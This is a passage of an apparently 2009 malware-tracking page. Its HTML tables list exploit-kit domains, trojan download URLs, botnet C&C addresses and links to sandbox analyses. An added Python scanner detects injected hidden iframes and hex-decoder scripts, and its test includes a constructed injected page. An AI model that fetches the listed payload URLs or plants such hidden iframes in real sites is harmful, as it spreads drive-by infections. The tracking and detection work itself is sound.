target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">promixgroup.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=9dd3221d3789cb6adc758610a48ebb5a&t=1239052802&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span 
class="trojans_luckysploit">yourliteseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=2587c7959e1726de2ba36e2988c1a74d&t=1239052792&type=js" target="_blank">Analysis</a></td> </tr><tr> <td> </td> <td> </td></tr><tr> <td><span class="trojans_luckysploit">ghrgt.hostindianet.com/index.php</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&t=1239052803&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">lieliteautobody.cn/load.php?id=4<br />[94.247.3.151] </span></td> <td><a href="http://anubis.iseclab.org/?action=result&task_id=16e978b65ea02b6641566b279bd76918a" target="_blank">Anubis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=16e978b65ea02b6641566b279bd76918a" target="_blank">VirusTotal</a><br />
Botnet C&C: 213.155.4.82<br /><a href="http://anubis.iseclab.org/index.php?action=show_cluster&cluster_id=1175580">Anubis Family 1175580</a><br /></td> </tr><tr> <td> </td> <td> </td></tr><tr> <td><span class="trojans_luckysploit">ghrgt.hostindianet.com/cache/readme.pdf</span></td> <td><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53174ae137690fab4987e35ad66c6989&t=1237602362" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">zzzz.hostindianet.com/load.php?id=4</span></td> <td><a href="http://anubis.iseclab.org/?action=result&task_id=17853954c8943ac946177e41ebe0e066b" target="_blank">Anubis</a> - <a href="http://www.virustotal.com/analisis/385099e73f02b35dfe596adb177f0524" target="_blank">VirusTotal</a> <br />Botnet C&C: <br />213.155.4.80<br />78.109.30.224</td></tr><tr> <td> </td> <td> </td></tr><tr> <td height="80" colspan="2"><br />Also cited on Dancho Danchev's blog <a href="http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html" target="_blank">here</a> in the series of iframed embassy websites (11 of them - including hostindianet[.]com) (<a href="http://wepawet.iseclab.org/view.php?hash=100c37951c22d9a6e2b22a10f802b65c&t=1236822958&type=js" target="_blank">Analysis</a>)</td> </tr></table><br /><br /><br /><br /><hr />
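To find the injected content that the disinfection advice above tells you to remove, it helps to scan the whole web root for the markers the samples on this page share: hidden or 1x1 IFRAMEs, hex strings spliced with an empty variable, parseInt(x, 16) and String.fromCharCode decoders, document.write(unescape(...)), and the if(!myia) guard. The scanner below is an added example, not the blog's or any vendor's tool; it scores each file by the distinct markers it contains so that a single parseInt(x, 16) in legitimate code does not trigger on its own, and the web root it scans is a constructed temporary directory with one clean page and one injected page (placeholder URL).

```python
"""Web-root scanner for the injection markers seen on this page.

Added example, not the blog's or any vendor's tool.  Each marker carries a
weight; a file is reported only when the weights of its distinct markers
reach `threshold`, so one parseInt(x, 16) in legitimate code is not enough
on its own.  The web root scanned by build_constructed_webroot() is a
temporary directory built here with one clean page and one injected page.
"""
import os
import re
import tempfile

# (label, weight, pattern) -- markers taken from the loader samples above
SIGNATURES = [
    ("hidden iframe (visibility:hidden)", 3,
     re.compile(r"<iframe\b[^>]*visibility\s*:\s*hidden", re.I)),
    ("hidden iframe (1x1)", 3,
     re.compile(r"""<iframe\b[^>]*width=['"]?[01]['"]?\s+height=['"]?[01]['"]?""", re.I)),
    ("if(!myia) guard", 3, re.compile(r"if\s*\(\s*!\s*myia\s*\)")),
    ("document.write(unescape(", 2,
     re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("spliced hex literal", 2,
     re.compile(r"'[0-9A-Fa-f]{2,}'\s*\+\s*\w+\s*\+\s*'[0-9A-Fa-f]+'")),
    ("parseInt(..., 16) decoder", 1, re.compile(r"parseInt\([^)]*,\s*16\s*\)")),
    ("String.fromCharCode", 1, re.compile(r"String\.fromCharCode")),
]
SCAN_EXTENSIONS = {".html", ".htm", ".php", ".js", ".tpl", ".inc"}


def scan_file(path: str) -> list:
    """Return [(line_number, label, weight)] for every marker hit in the file."""
    hits = []
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for label, weight, pattern in SIGNATURES:
                if pattern.search(line):
                    hits.append((lineno, label, weight))
    return hits


def scan_webroot(root: str, threshold: int = 3) -> dict:
    """Map 'relative/path' -> (score, hits) for files scoring >= threshold."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            # distinct markers only: the same marker on ten lines counts once
            score = sum(weight for _label, weight in {(h[1], h[2]) for h in hits})
            if score >= threshold:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                report[rel] = (score, hits)
    return report


def build_constructed_webroot() -> str:
    """Create a temporary web root: index.html is clean, blog/post.php carries
    the kind of injected block shown above (constructed, placeholder URL)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "blog"))
    clean = ("<html><body><h1>Hello</h1>\n"
             "<script>var n = parseInt('ff', 16);</script>\n"   # one weak marker
             "</body></html>\n")
    injected = (
        "<html><body><h1>Hello</h1>\n"
        "<iframe src='http://example.invalid/' width='1' height='1' "
        "style='visibility: hidden;'></iframe>\n"
        "<script>function d(s){return parseInt(s,16);}\n"
        "var x60='';var p='3C736'+x60+'3726'+x60+'970743E';\n"
        "var out='';for(var i=0;i<p.length;i+=2){out+=String.fromCharCode(d(p.substr(i,2)));}\n"
        "</script></body></html>\n")
    for rel, body in (("index.html", clean), ("blog/post.php", injected),
                      ("style.css", "body { color: #333 }\n")):
        with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    webroot = build_constructed_webroot()
    for rel, (score, hits) in sorted(scan_webroot(webroot).items()):
        print("%s  score=%d" % (rel, score))
        for lineno, label, _w in hits:
            print("    line %d: %s" % (lineno, label))
```

Point `scan_webroot()` at a copy of the real document root and review every reported file by hand before cleaning it; the line numbers in the hits are where the injected block starts, and the same block usually appears at the same position in every page the attacker touched.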
On the next IP:<br /><br />94.247.3.151 [hs.3-152.zlkon.lv]<br /><br /><table width="512" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC"><tr> <td><span class="trojan">hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)</span></td> <td width="276"> </td></tr><tr> <td height="86">hxxp://cheapslotplay.cn/in.cgi?income48</td> <td>Redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php (dead)<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td> </tr><tr> <td>hxxp://daddybigtop.cn</td> <td>Load trojan on<br />hxxp://freeonlinehostguide.com/load.php<br /><a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&t=1239059094&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1552cc1212a74b88461563200051fe3b5" target="_blank">Anubis</a><br />Detection: <br />Trojan-Downloader.Win32.Bredolab!IK <br />TR/Crypt.ZPACK.Gen <br />Trojan-Downloader.Win32.Bredolab<br />Trojan:Win32/Meredrop <br /><br />Using a stack overflow in Adobe Reader 8.1.2 <br /><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992" target="_blank">CVE-2008-2992</a></td> </tr><tr> <td height="26">hxxp://educationbigtop.cn</td> <td><a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4" target="_blank">VirusTotal Report</a> (Bredolab)</td></tr><tr> <td><span class="trojan">hxxp://freehostinternet.com</span></td> <td>Load trojan on<br />hxxp://daddybigtop.cn/load.php<br /><a 
href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=137aa20f0f4fcbc34e5ba23aedef48abb" target="_blank">Anubis</a><br />Detection: <br />Trojan-Downloader.Win32.Bredolab<br /> <br /> Connects to botnet: 213.155.6.33<br /></td></tr><tr> <td width="230" height="206"><span class="trojans_luckysploit">hxxp://freeonlinehostguide.com/<br />index.php</span></td> <td>Load trojan on<br />hxxp://zzz.free.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033&type=js" target="_blank">Javascript Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank">Anubis</a><br />Detection: <br />TR/Crypt.XPACK.Gen<br />Win32:Walpak<br />Win32/Kryptik.LI<br />Trojan.Waledac.Gen!Pac.8 <br /><br />It connects to a URL and drops the file "digiwet.dll"<br />Botnets C&C: <br />turokgame.cn [74.50.98.156]<br />94.247.2.95 and 78.109.30.224<br /></td> </tr><tr> <td height="26"><span class="trojan">hxxp://freewebhostguide.com</span></td> <td><a href="http://safeweb.norton.com/report/show?name=freewebhostguide.com" target="_blank">Symantec</a></td></tr><tr> <td><span class="trojan">hxxp://greatbethere.cn</span></td> <td>Load trojan on<br />hxxp://greatbethere.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/893c4ed46d09f4d1c43ae40fbdef2bf8">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=666f614786902fd2352c0039e9dd2d04&t=1238102754&type=js" target="_blank">Javascript Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e76a4475454c09940d2671f4c52d7293" target="_blank">Anubis</a><br 
/>Detection: <br />TR/Crypt.XPACK.Gen<br />Win32:Walpak<br />Win32/Kryptik.LI<br />Trojan.Waledac.Gen!Pac.8 <br /><br />Using a stack overflow in Adobe Reader 8.1.1 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank">CVE-2007-5659</a> <br /><br />It connects to a URL and drops the file "digiwet.dll"<br />Botnets C&C: <br />213.155.6.32<br />78.109.30.224<br /></td></tr><tr> <td height="26">hxxp://hugetopnonfat.cn</td> <td>dead</td></tr><tr> <td height="83"><span class="trojan">hxxp://mediahomenamemartvideo.cn/<br />in.cgi?income</span></td> <td>Botnet C&C / redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php (dead)<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=dbf20d61a135033ff904d1e4aa193469&t=1239238663&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td></tr><tr> <td height="131">hxxp://hyperliteautoservices.cn</td> <td>Redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/8327265e423bd2c7e19456119d389691">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=18be328f7652759e471e87bf6afa41cf8" target="_blank">Anubis</a><br /> Flash exploit is also live:<br />
<br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Flash Analysis</a><br />Botnet C&C: 78.109.29.112 <br /></td> </tr><tr> <td height="20">hxxp://lieliteautobody.cn (dead)</td> <td> </td></tr><tr> <td height="36"><span class="trojans_luckysploit">hxxp://liteautofinestsite.cn/load.php</span></td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">hxxp://liteautofinestsite.cn/load.php</span><br /></td> </tr><tr><td height="117">hxxp://liteautogreatest.cn</td><td>Exploits<br /> hxxp://liteautogreatest.cn/cache/readme.pdf<br /> hxxp://liteautogreatest.cn/cache/flash.swf <br /> to load trojan on<br /> hxxp://liteautogreatest.cn/load.php<br /> <a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=88dbec3ba9da0df0a5f94806ec303516&t=1239816944&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19d052d8429d68d3409883523bde4b33d" target="_blank">Anubis<br /> <br /> </a> Flash exploit is also live:<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Flash Analysis</a> - <a href="http://www.virustotal.com/analisis/d53523199a75b38f03300473508594d8" target="_blank">VirusTotal</a><br /> <br /> Botnet C&C: 78.109.29.112</td></tr>
<tr> <td height="117"><span class="trojans_luckysploit">hxxp://liteautorepair.cn</span></td> <td>Exploit to load trojan on <br />zzzz.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/37d49709ee09ba69072ce158ec0a4ddb">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=f4bec9780ebb9269d46becfb0557e391&t=1238886038&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1fff28d7a01d6b344ed7184ef3ca0537f" target="_blank">Anubis</a><br /><br />Detection:<br />Trojan-Downloader.Win32.Bredolab<br /><br />Botnet controller: 213.155.4.82 </td></tr><tr> <td height="119">hxxp://litedownloadfinest.cn</td> <td>Exploit to load trojan on <br />zzzz.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/4b25552e0659179a22fec8cc6208ad57">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=233e11cebbf860a6b689cd27b0a0cd92&t=1239013312&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=158efd3418e4e7c8495803043e3960cb9&format=html" target="_blank">Anubis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.B<br /><br />Previous botnet controller: 78.109.29.112</td> </tr><tr> <td height="148"><span class="trojans_luckysploit">hxxp://litehitscar.cn/index.php</span></td> <td>Exploit to load trojan on <br />hyperliteautoservices.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /><br />Detection:<br />Trojan.Botnetlog.3<br /><br />Botnets: <br />78.109.29.112 - 78.109.30.224<br />74.54.77.82</td> </tr><tr> <td height="37"><span 
class="trojans_luckysploit">hxxp://lieliteautobody.cn/load.php</span></td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">lieliteautobody.cn/load.php</span><br /></td> </tr><tr> <td height="38">hxxp://liteautofinestsite.cn/load.php</td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">liteautofinestsite.cn/load.php</span><br /></td> </tr>
<tr><td height="148"><span class="trojans_luckysploit">hxxp://liteupyourride.cn/</span></td><td>Exploits<br /> hxxp://<span class="trojans_luckysploit">liteupyourride.cn</span>/cache/readme.pdf<br /> hxxp://<span class="trojans_luckysploit">liteupyourride.cn</span>/cache/flash.swf <br /> to load trojan on<br /> hxxp://<span class="trojans_luckysploit">litehitscar.cn</span>/load.php<br /><a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1f36ed14afffc55d4718874ebbc2924cf&call=first" target="_blank">Anubis<br /><br /></a> PDF exploit is also live:<br /><a href="http://wepawet.cs.ucsb.edu/view.php?hash=4925255f3716377f7fcb7c9bfb038795&t=1240163655&type=js" target="_blank">PDF Analysis</a> - <a href="http://www.virustotal.com/analisis/46adc25de221146ea1a2458c97602518" target="_blank">VirusTotal</a><br /><br /> Botnet C&C: 78.109.29.112</td></tr>
<tr> <td>hxxp://yournonfatbest.cn</td> <td>Exploit to load trojan on <br />farm-en-12san.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/cc3417a8cbf0389ad12163327c8732df">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=e89d7bf9986d2d0c646386ce37a66711&t=1238583254&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=15848c72b1c5577b4ed8e07e237c0788c" target="_blank">Anubis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.G<br /><br />Botnets: <br />213.155.4.82<br />78.109.30.224</td> </tr><tr> <td>hxxp://lotbetsite.cn</td> <td>Exploit to load trojan on <br />casinoslotbet.cn/load.php - <a href="http://wepawet.iseclab.org/view.php?hash=1c3cfb439f08852425dbc8040ecb520a&t=1238733983&type=js" target="_blank">Analysis</a><br /><a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=120feec140b719c44296a36691cde80bf&format=html" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&t=1239208603&type=js" target="_blank">Flash Exploit Analysis</a><br /><br />Detection:<br />Trojan-Downloader.Win32.Bredolab<br /><br />Botnet: <br />213.155.6.33<br /></td></tr><tr> <td> </td> <td> </td></tr><tr> <td>hxxp://hugetopnonfat.cn/in.cgi?id1000</td> <td><a href="http://jsunpack.jeek.org/dec/go?url=hugetopnonfat.cn_in.cgi_id1000" target="_blank">Javascript Analysis</a></td></tr><tr> <td>hxxp://PremiumNonfat.cn/all/<br />
</td> <td>dead</td></tr></table><hr /><br /> 94.247.3.150 [hs.3-150.zlkon.lv]<br /><br /><table width="544" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC">
<tr><td height="37">hxxp://autobestwestern.cn/<br />cache/readme.pdf</td><td>Exploit to load trojan on <br />litehitscar.cn/load.php?id=5 - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=8233c2b3088873d86d042ce79289e44d&t=1240167118&type=js" target="_blank">Analysis</a><br /><a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1cc774803b2c2ab249d677b9f5a678ead" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&t=1239208603&type=js" target="_blank">Flash Exploit Analysis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.Q<br /><br />Botnet: <br />78.109.29.112<br /></td></tr><tr><td>hxxp://coolnameshop.cn/in.cgi?income</td><td> </td></tr><tr> <td>hxxp://cutlot.cn/in.cgi?income</td> <td>Botnet C&C / Exploits to <br /> hxxp:// liteautogreatest.cn/index.php<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=20142646ae8f7bfe737f067a3b9727b4&t=1240007105&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hxxp://litehitscar.cn/load.php?id=5<br /> <a href="http://www.virustotal.com/analisis/ad5c23d5a7c497bb790eef37979113d5" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1d42a8cbbf551c5a4e9de58e48e6eb20f" target="_blank">Anubis</a><br /> <br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /> </a></td></tr><tr><td width="218">hxxp://dotcomnameshop.cn</td><td width="320">Botnet C&C</td></tr><tr><td>hxxp://lotante.cn</td><td>Botnet C&C / Exploits to litehitscar.cn/index.php<br /> <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a 
href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://lotbetworld.cn/in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.iseclab.org/view.php?hash=b9af869590a473fc6ba9f5ca8d498872&t=1239080318&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td height="101">hxxp://homenameregistration.cn</td><td>Botnet C&C / Exploits to 78.41.207.196/vertu/?t=5<br /> <a href="http://wepawet.iseclab.org/view.php?hash=98f5276a9ceaaceab5f02eaba5fb201f&t=1237346408&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> 78.41.207.196<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=100c37951c22d9a6e2b22a10f802b65c&t=1236822958">Analysis</a><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://hugetopnonfat.cn</td><td>Botnet C&C</td></tr><tr><td>hxxp://dotcomnameshop.cn/<br />in.cgi?income</td><td>Botnet C&C / Redirect to exploits <br />hxxp://litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a 
href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&t=1239059244&type=js" target="_blank">Redirection Analysis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Exploit analysis</a><br /> then load trojan located<br />hxxp://hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://japanhostnet.com/<br />in.cgi?income</td><td>Botnet C&C / Redirect to exploits litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&t=1239059244&type=js" target="_blank">Redirection Analysis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Exploit analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td height="40">hxxp://internetnamestore.cn/<br />in.cgi?income18</td><td>hyperliteautoservices.cn/index.php [94.247.3.151] <a href="http://anubis.iseclab.org/?action=result&task_id=1fdf218137076cf6465f76e3f183c3174&format=html" 
target="_blank">Analysis</a></td></tr><tr><td height="40">hxxp://lotmachinesguide.cn/<br />in.cgi?income</td><td>Redirects to exploits<br /> hxxp://liteautogreatest.cn/cache/readme.pdf<br /> hxxp://liteautogreatest.cn/cache/flash.swf <br /> to load a trojan from<br /> hxxp://liteautogreatest.cn/load.php<br /><a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=40131580bd98592c013be3d33aa926b1&t=1239959058&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19d052d8429d68d3409883523bde4b33d" target="_blank">Anubis</a><br /><br />Botnet C&C: 78.109.29.112</td></tr><tr><td>hxxp://mainnameshop.cn</td><td>Redirect to exploits sdfi.hostindianet.com/index.php (dead)<br /> <br /> Detection: Win32/Bredolab.B</td></tr><tr><td>hxxp://mediahomenamemartvideo.cn</td><td>Botnet C&C down (TS v3.2)</td></tr><tr><td>hxxp://mediahousenameshopfilm.cn</td><td> </td></tr><tr><td height="192">hxxp://nameashop.cn/in.cgi?income</td><td>On 2009-03-21 01:40:07 - <a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&t=1237624807&type=js" target="_blank">Analysis</a><br /> Redirect to exploit on <br />hxxp://sadcwed.hostindianet.com/index.php<br /> On 2009-04-05 13:22:58 - <a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&t=1238962978&type=js" target="_blank">Analysis</a><br /> Redirect to exploit on <br /> freeonlinehostguide.com/index.php <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033">Analysis</a> - <a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=17a3cc78e642b0a742187d9341ae4bcec" 
target="_blank">Anubis</a><br /> Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen<br /> It connects to a botnet and drops the file "digiwet.dll"<br /> Botnets: <br /> turokgame.cn [74.50.98.156]<br /> 94.247.2.95 and 78.109.30.224<br /></td></tr><tr><td height="23">hxxp://namebrandmart.cn/in.cgi<br />?income18</td><td>litehitscar.cn/load.php <a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&t=1239055570&type=js" target="_blank">Analysis</a></td></tr><tr><td height="24">hxxp://namebuyline.cn</td><td> <a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&t=1239055570&type=js" target="_blank">Analysis</a></td></tr><tr><td height="76">hxxp://namebuypicture.cn/<br />in.cgi?income31</td><td>Botnet C&C / redirect to exploit<br /> hyperliteautoservices.cn/index.php (dead)<br /> but the trojan is still available on<br /> hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=a4d97828eb9521d905394f4a6d7516df&t=1239246607&type=js" target="_blank">Analysis</a></td></tr><tr><td height="24">hxxp://namesupermart.cn</td><td>Botnet C&C</td></tr><tr><td height="79">hxxp://namestorefilmlife.cn/<br /> in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn<br /> <a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&t=1239080309&type=js" target="_blank">Analysis</a><br /> then loads a trojan located at<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td></tr><tr><td height="93">hxxp://perfectnamestore.cn<br /> 
